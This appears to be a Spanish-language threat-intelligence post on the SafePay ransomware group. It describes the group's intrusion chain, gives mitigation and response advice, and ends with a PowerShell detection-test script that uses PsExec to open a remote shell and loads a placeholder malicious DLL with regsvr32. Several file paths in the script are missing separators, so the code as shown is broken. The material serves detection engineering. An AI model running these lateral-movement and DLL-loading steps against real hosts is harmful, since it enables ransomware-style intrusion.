SOC Prime Bias: Alto

14 Jan 2026 16:49 UTC

Dentro de SafePay: Analizando el Nuevo Grupo de Ransomware Centralizado

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Dentro de SafePay: Analizando el Nuevo Grupo de Ransomware Centralizado
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

SafePay es una operación de ransomware recientemente surgida que parece funcionar como un grupo centralizado y controlado rigurosamente, en lugar de un ecosistema típico de Ransomware como Servicio. Los actores siguen un manual de doble extorsión, preparando datos sensibles antes de la encriptación y amenazando con su publicación a través de un sitio de fugas basado en Tor. La entrega comúnmente implica una DLL nativa de Windows, con ejecución y propagación soportadas por utilidades ampliamente disponibles de vivir de la tierra. En los casos observados, la línea de tiempo de extremo a extremo es agresiva, comprimiendo frecuentemente el acceso inicial a través de la encriptación del entorno en aproximadamente un periodo de 24 horas.

Investigación

Los investigadores informan que SafePay a menudo asegura el acceso a través de cuentas VPN o RDP expuestas usando credenciales robadas o adivinadas, y en algunos escenarios abusa de implementaciones de FortiGate mal configuradas, especialmente en entornos que carecen de MFA. Para persistencia, se ha observado a los operadores desplegar puertas traseras como QDoor y aprovechar herramientas legítimas de administración remota, incluyendo ScreenConnect, para integrarse en la actividad normal de TI. El movimiento lateral generalmente se impulsa a través de PsExec y WinRM, mientras que el descubrimiento de anfitriones y recursos compartidos es apoyado por una utilidad personalizada de PowerShell (ShareFinder.ps1). Antes de la encriptación, la carga útil realiza acciones «previas al rescate» diseñadas para maximizar el impacto y dificultar la recuperación: remueve copias sombra, altera configuraciones de arranque y termina un conjunto de procesos y servicios relacionados con la seguridad que están codificados de manera rígida.

Mitigación

Requiere MFA a través de todas las vías de acceso remoto y reduce el riesgo del firewall restringiendo la autenticación de cuentas locales y limitando la exposición administrativa. Monitorea el uso anómalo de PsExec, WinRM, regsvr32 y rundll32, especialmente en secuencias consistentes con la ejecución y preparación remotas. Ajusta las detecciones de endpoints para detectar la terminación de herramientas de seguridad comunes, la eliminación de copias sombra y los cambios a configuraciones BCD/boot. Reduce las oportunidades de ejecución bloqueando o controlando estrictamente la carga de DLL no firmadas y aplicando políticas de control de aplicaciones en endpoints y servidores.

Respuesta

Cuando se identifican indicadores de SafePay, aísla inmediatamente los sistemas afectados, captura memoria volátil y preserva registros relevantes de autenticación, endpoints y red. Identifica y bloquea la infraestructura de comando y control asociada, luego termina los procesos maliciosos y elimina mecanismos de persistencia. Intenta acciones de recuperación como restaurar copias sombra donde sea posible, pero asume que el robo de datos podría haber ocurrido y valida el alcance de la exfiltración. Completa una revisión forense completa para determinar los datos impactados y ejecuta notificaciones a las partes interesadas y pasos de escalamiento alineados a los procedimientos de respuesta de doble extorsión.

Flujo de Ataque

Ejecución de Simulación

Prerequisito: La Verificación Pre-Flight de Telemetría y Línea Base debe haber pasado.

Racional: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTPs identificadas y apuntar a generar la telemetría exacta esperada por la lógica de detección.

  • Narrativa de Ataque y Comandos:
    Un adversario con credenciales de Administrador de Dominio compromete una máquina de pivote y utiliza PsExec para lanzar un cmd.exe en un host secundario (TARGET_IP). Inmediatamente después de establecer el shell remoto, el atacante transfiere una DLL maliciosa (malicious.dll) al host remoto y la carga usando regsvr32.exe (alternativamente rundll32.exe) para ejecutar la carga útil de ransomware. La secuencia produce dos eventos de creación de procesos distintos que satisfacen la regla Sigma: un proceso de PsExec con la línea de comando exacta y un proceso de cargador de DLL subsecuente.

  • Guion de Prueba de Regresión:

    # -------------------------------------------------------------------------
    # Simulación de Ransomware SafePay – PsExec + Regsvr32
    # -------------------------------------------------------------------------
    # Prerrequisitos:
    #   - PsExec.exe en el directorio actual o en PATH
    #   - Una DLL maliciosa llamada malicious.dll colocada en la misma carpeta
    #   - Credenciales válidas de administrador del dominio (reemplazar marcadores de posición)
    # -------------------------------------------------------------------------
    
    $targetIP   = "10.0.0.20"            # <--- CAMBIAR A SU OBJETIVO
    $username   = "DomainAdmin"        # <--- CAMBIAR A USUARIO VÁLIDO
    $password   = "Password123!"        # <--- CAMBIAR A CONTRASEÑA VÁLIDA
    $dllPath    = "$PSScriptRootmalicious.dll"
    
    # 1) Ejecutar cmd.exe remoto a través de PsExec
    Write-Host "[*] Iniciando cmd.exe remoto a través de PsExec..."
    $psexecArgs = "$targetIP -u $username -p $password cmd.exe"
    & .PsExec.exe $psexecArgs
    
    Start-Sleep -Seconds 5  # dar tiempo a la sesión remota para empezar
    
    # 2) Copiar la DLL maliciosa al host remoto (usando SMB)
    Write-Host "[*] Copiando la DLL maliciosa a host remoto..."
    $destPath = "$targetIPC$Tempmalicious.dll"
    Copy-Item -Path $dllPath -Destination $destPath -Force
    
    # 3) Cargar la DLL a través de regsvr32 (esto genera el segundo evento)
    Write-Host "[*] Cargando la DLL maliciosa con regsvr32..."
    $regsvrArgs = "/s $destPath"
    & regsvr32.exe $regsvrArgs
    
    Write-Host "[+] Simulación completa. Verifique SIEM para alertas."
  • Comandos de Limpieza:

    # -------------------------------------------------------------------------
    # Limpieza para la Simulación SafePay
    # -------------------------------------------------------------------------
    $targetIP = "10.0.0.20"
    $dllRemote = "$targetIPC$Tempmalicious.dll"
    
    # Eliminar la DLL maliciosa del host remoto
    Write-Host "[*] Eliminando la DLL maliciosa del host remoto..."
    Remove-Item -Path $dllRemote -Force -ErrorAction SilentlyContinue
    
    # Opcionalmente terminar cualquier proceso regsvr32/rundll32 restante
    Get-Process -Name regsvr32, rundll32 -ErrorAction SilentlyContinue |
        Where-Object {$_.Path -like "*$targetIP*"} |
        Stop-Process -Force
    
    Write-Host "[+] Limpieza completa."